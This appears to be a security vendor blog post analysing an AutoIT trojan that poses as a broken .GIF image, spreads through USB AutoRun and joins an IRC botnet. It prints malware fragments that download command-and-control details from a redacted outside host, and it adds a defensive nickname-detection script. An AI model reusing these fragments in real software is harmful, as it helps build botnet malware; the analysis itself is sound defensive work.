This post is made on behalf of my colleague Manoj Venugopalan, Malware Analyst for Symantec Hosted Services.
AutoIT, a free automation language for Windows platform-based development, is often used for scripting Windows-based applications and is sometimes misused for creating malware. AutoIT scripts can be compiled into a compressed, standalone executable which runs without an interpreter. Aut2Exe is the application used to compile an AutoIT script into a standalone executable.
Most of the malware based on AutoIT is in the form of worms and Trojans. Many such worms are well-known for logging into a user's IM client, changing their status message and then sending copies of the malware to all of the "buddies" in the victim's list.
MessageLabs Intelligence recently discovered an AutoIT Trojan using IRC (online chat) to connect an infected machine to a command and control channel without the user's knowledge. The malware is sent in the form of an enticing message containing an archive of .GIF files with a subject like "My Photos" to around 50 recipients to lure them into opening the attachment.
[Figure 1 - Example Email]
One of the files, disguised as a .GIF image, is actually an executable using an image icon, and may give the illusion that the executable is a broken image (as seen in figure 2, below). If the user tries to open the file, it will execute and give the appearance that something hasn't worked correctly, as no image is displayed; the user may draw the conclusion that it is nothing more than a corrupt image.
[Figure 2 - Content of Attached Archive File]
Once the executable is triggered, it connects to a website based in Vietnam (.vn) and downloads instructions to connect to an IRC server for its command and control. These are saved as a plain text file and used to join the correct channel. In order to propagate further, the malware also attempts to copy itself to any removable drives (including media players and USB memory sticks), creating an AutoRun.INF file alongside it. This file will invoke the malicious application whenever the drive is connected to a computer (unless the auto-execute feature has been disabled by the user).
[Figure 3 - Text File Being Downloaded, Identifying Command and Control Channel]
Once connected, further instructions may be downloaded as the infected machines are now joined to a small botnet, or robot network. A botnet may be used to conduct Distributed Denial of Service (DDoS) attacks, sending spam, hosting websites, targeting other computers by exploiting existing vulnerabilities and pushing adware or spyware on to infected machines.
Below are some fragments of the script code used:
INETGET ( "http://[removed].vn/[removed].php" , @SYSTEMDIR & "\[removed].txt" , 1 , 0 )
This call downloads the IRC details, which are parsed later to extract the IRC server name, the port to connect to, the channel name and the version of the malware application (presumably used to provide an update facility).
Once it has collected all this information, it then tries to identify the infected machine’s external IP address by contacting another website for this purpose.
INETGET ( "http://[removed].com/" , @SYSTEMDIR & "\ip.txt" , 1 , 0 )
The above call retrieves the external IP address of the machine and stores it in the file ip.txt.
It then creates a nickname for the computer to use when connecting to the channel; the nickname is a combination of a common tag and eight randomly generated letters:
$NICK = "[REMOVED]-" & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) ) & CHR ( RANDOM ( 65 , 90 , 1 ) )
After this it then connects to the IRC channel in the background to join the botnet.
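The naming scheme above is something a defender can look for on the wire: a fixed tag, a hyphen, and eight letters each produced by CHR(RANDOM(65, 90, 1)), i.e. 'A' to 'Z'. The following is an added example, not code from the original post, that groups IRC NICK registrations from constructed sample traffic by tag and reports tags that several hosts share; the tag "BOTTAG" is a placeholder, since the real one was redacted.

```python
import re

# Nick pattern described in the post: <tag>-<eight letters from CHR(RANDOM(65,90,1))>.
# The real tag was redacted; "BOTTAG" in the sample below is a constructed placeholder.
NICK_RE = re.compile(r"^(?P<tag>[A-Za-z0-9_]{2,16})-(?P<rand>[A-Z]{8})$")

def parse_nick(line):
    """Return the nickname from a raw client->server IRC 'NICK' line, else None."""
    parts = line.strip().split()
    if len(parts) >= 2 and parts[0].upper() == "NICK":
        return parts[1].lstrip(":")
    return None

def suspicious_nicks(lines, min_hosts=2):
    """Group NICK registrations that match the worm's scheme by their tag and
    return only tags seen from at least `min_hosts` distinct source hosts.
    `lines` are (src_ip, raw_irc_line) tuples. A single random-looking nick is
    weak evidence; the same tag with different random suffixes from several
    machines is the signature of bots registering, not of people choosing names."""
    by_tag = {}
    for src, raw in lines:
        nick = parse_nick(raw)
        if nick is None:
            continue
        m = NICK_RE.match(nick)
        if m is None:
            continue
        by_tag.setdefault(m.group("tag"), set()).add((src, nick))
    return {tag: sorted(members) for tag, members in by_tag.items()
            if len({src for src, _ in members}) >= min_hosts}

# Constructed sample capture (not from the original post).
SAMPLE = [
    ("10.0.0.11", "NICK BOTTAG-QWJXKPLA"),
    ("10.0.0.11", "USER a 0 * :a"),         # not a NICK line, ignored
    ("10.0.0.12", "NICK BOTTAG-ZZRTMBCD"),
    ("10.0.0.13", "NICK alice_w"),           # ordinary user, no tag/hyphen
    ("10.0.0.14", "NICK BOTTAG-HHQWERTY"),
    ("10.0.0.15", "NICK dev-MACHINE"),       # seven letters, does not match
]

if __name__ == "__main__":
    for tag, members in suspicious_nicks(SAMPLE).items():
        print(tag, members)
```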
The approach of using AutoIT as a toolkit for creating malware has been around for some years; however, many anti-virus vendors still struggle to detect such samples accurately without incurring a high number of false positives (when legitimate software is misidentified as malware). This is one reason why AutoIT is still being used in this way. It is also very flexible and easy to program, and when compiled, the executable is compressed and packed using UPX (a well-known open-source compression tool), making the code highly obfuscated and harder for anti-virus software to analyse without a signature.
Although the recent case may not have been used in a targeted attack, many examples using this technique that were blocked by Skeptic were sent to financial institutions, which could potentially expose the business to further attack or compromised data.